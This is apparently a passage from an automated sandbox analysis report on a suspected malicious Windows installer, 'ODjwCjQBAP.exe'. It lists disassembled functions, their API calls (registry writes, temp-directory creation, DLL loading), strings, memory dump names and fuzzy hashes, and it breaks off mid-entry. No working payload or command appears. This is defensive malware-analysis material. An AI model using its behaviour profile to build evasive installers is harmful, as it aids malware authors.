C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll, xrefs: 00401826, 00401842
C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp, xrefs: 004017A3, 00401812, 00401830
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme$C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp$C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll$Call
API String ID: 1941528284-3991361650
Opcode ID: f1777878cc107186975007c34ec6e0b6c00b7ce99c1c8040aed14bca133d0caf
Instruction ID: 1ba5c428860e61568eef0a4ccac71dac967fbf7ecb8295bcfefdc03a30224d69
Opcode Fuzzy Hash: f1777878cc107186975007c34ec6e0b6c00b7ce99c1c8040aed14bca133d0caf
Instruction Fuzzy Hash: 2341F471A04515BACF107BB5DC45EAF3678EF41328B20823BF021B11E2DA3C8A419FAD

Function 00405110 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll), ref: 0040517E
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll, xrefs: 00405130, 00405142, 00405148, 0040516B, 00405177

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll
API String ID: 2531174081-1281949463
Opcode ID: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
Instruction ID: 38fa31381a166635c2069e030e34d3db0945d62c2eda65f80c6bd2e149c96a35
Opcode Fuzzy Hash: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
Instruction Fuzzy Hash: FD215C71E00518BBDF119FA5CD80ADFBFB9EB04354F14807AF904AA291C7799A41CFA8

Function 004055D6 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405619
GetLastError.KERNEL32 ref: 0040562D
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405642
GetLastError.KERNEL32 ref: 0040564C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055FC
ts@, xrefs: 004055DC
C:\Users\user\Desktop, xrefs: 004055D6
ds@, xrefs: 0040560B

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-891493705
Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction ID: f6395dc840433d181f75b3fc8fae80690a43e09e82cbb082af9cf45b84ce1534
Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction Fuzzy Hash: 82010871D04259EAEF119FA0DC44BEFBFB8EB14314F008576D908B6280D779A604CFAA

Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040A808), ref: 00401E1A

Strings

Calibri, xrefs: 00401E00

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: bb4ed6f87a37efe35c000b8666ffb1b526dfe741b0ab838eec61f989ca6ede26
Instruction ID: 31dc6bfce766dd2e9c365b6b9c1ce0fa0646d0edadaed3ffd0317ad467dc8ee1
Opcode Fuzzy Hash: bb4ed6f87a37efe35c000b8666ffb1b526dfe741b0ab838eec61f989ca6ede26
Instruction Fuzzy Hash: 1E017572948340AFE7006B74AE4EB993FF4DB95315F10847AF201B62E2C6B905528F6E

Function 00406222 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
wsprintfA.USER32 ref: 00406272
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406286

Strings

\, xrefs: 0040624A
%s%s.dll, xrefs: 0040626C
UXTHEME, xrefs: 0040622B

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction ID: 4eb1d724573375327ef03b870ab6fb06d37159ba94d5fa14c1e1425601a81350
Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction Fuzzy Hash: A2F0FC3090011AA7DB24B768DC0DFEB365CAB08305F1401BAA546E11D1D578F9258B69

Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Strings

C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp, xrefs: 00402422, 00402430, 00402444, 00402458, 00402463

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp
API String ID: 1356686001-521666370
Opcode ID: 532cf4714589016526744554cc58b87e9890b833549d6e086e2f56b221f18e11
Instruction ID: 45e6817f5ac0ad5077c8573445b5e51b6f54d3a00a8772886ac111494e5e57ea
Opcode Fuzzy Hash: 532cf4714589016526744554cc58b87e9890b833549d6e086e2f56b221f18e11
Instruction Fuzzy Hash: B52181B1E00109BEEB10EFA4DE49EAF7BB8EB54358F20403AF505B61D1D6B95D019B28

Function 00405B99 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405BAD
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405BC7

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B9C
nsa, xrefs: 00405BA4
"C:\Users\user\Desktop\ODjwCjQBAP.exe", xrefs: 00405B99

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\ODjwCjQBAP.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2095312468
Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction ID: bfd989d901498d13fd43eebbd57bf0dae5b4b0e38faf5f28c0e1a6b78de2ea97
Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction Fuzzy Hash: B7F082367086046BEB108F55EC04B9B7BACDF91750F10C03BFA08DA1D0E6B5F9548B59

Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402B2F
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
RegCloseKey.ADVAPI32(?), ref: 00402B74
RegCloseKey.ADVAPI32(?), ref: 00402B99
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 1b6bc3f1deefa661c1c70c6fa14cacfade3144c59ce8f26d4f2651a72c65fdc8
Instruction ID: cbb66f3b7e8ae2888f759c75a40f8dd5de3b5766fb854263a8955dc236021e84
Opcode Fuzzy Hash: 1b6bc3f1deefa661c1c70c6fa14cacfade3144c59ce8f26d4f2651a72c65fdc8
Instruction Fuzzy Hash: 39117C71A00108FFDF11AF90DE89DAA3B7DEB54345F004076FA05F10A0D378AE51AB69

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2

Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

Function 004030F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040310C

Part of subcall function 00403277: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F75,?), ref: 00403285

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403022,00000004,00000000,00000000,?,?,00402F9C,000000FF,00000000,00000000,00409130,?), ref: 0040313F
SetFilePointer.KERNELBASE(0028EF7A,00000000,00000000,004128D8,00004000,?,00000000,00403022,00000004,00000000,00000000,?,?,00402F9C,000000FF,00000000), ref: 0040323A

Strings

z(, xrefs: 004030FB, 00403218

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: z(
API String ID: 1092082344-1367383871
Opcode ID: f6133f0060067ae216a0a077ebe86ad3920cfc852d280aeddc091818d184f87e
Instruction ID: b8bc3f79dcbb40427391aad23e9a2a3a4e055ade3e5059820f7b6748c1a5a64e
Opcode Fuzzy Hash: f6133f0060067ae216a0a077ebe86ad3920cfc852d280aeddc091818d184f87e
Instruction Fuzzy Hash: 3131A2B29042109BDB10BF29EE8086A3BECF754756715823FE501B22E0C738DD52DB5E

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
Instruction ID: 023f80fe09a274ffd38664002148efa248b1b49841e283c842910b226ff12a9e
Opcode Fuzzy Hash: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
Instruction Fuzzy Hash: BA219171A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA7886408B28

Function 00401FFF Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A

Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll), ref: 0040517E
Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 725aac035963670df89eafb1b7d16b4a342722268493254e79787a1b1d8c7f06
Instruction ID: 7d08e1e337802b2334af88e0c199d29f708e40c37bf94ee781fb5d0f0b1c297d
Opcode Fuzzy Hash: 725aac035963670df89eafb1b7d16b4a342722268493254e79787a1b1d8c7f06
Instruction Fuzzy Hash: 7B219571E00225F7DB207FA48E49A6E7A74AB44354F20417BF601B22D1D6BE4A42965E

Function 00402FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F9C,000000FF,00000000,00000000,00409130,?), ref: 00403015

Strings

z(, xrefs: 0040300A, 004030AA, 004030EA

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FilePointer
String ID: z(
API String ID: 973152223-1367383871
Opcode ID: a1130b4f43b5ef58eef6a304646b232a08a6a9d0fa451b453d71d72267b47fb8
Instruction ID: 0c39837240ac6e21a4d945e0ab2cbfd2cf40700f690e74d620895d0cf024726c
Opcode Fuzzy Hash: a1130b4f43b5ef58eef6a304646b232a08a6a9d0fa451b453d71d72267b47fb8
Instruction Fuzzy Hash: 83316D30202219FFDB109F56EC85A9A3AACEB00355F20C53AF905E6195D339DE40EBA9

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

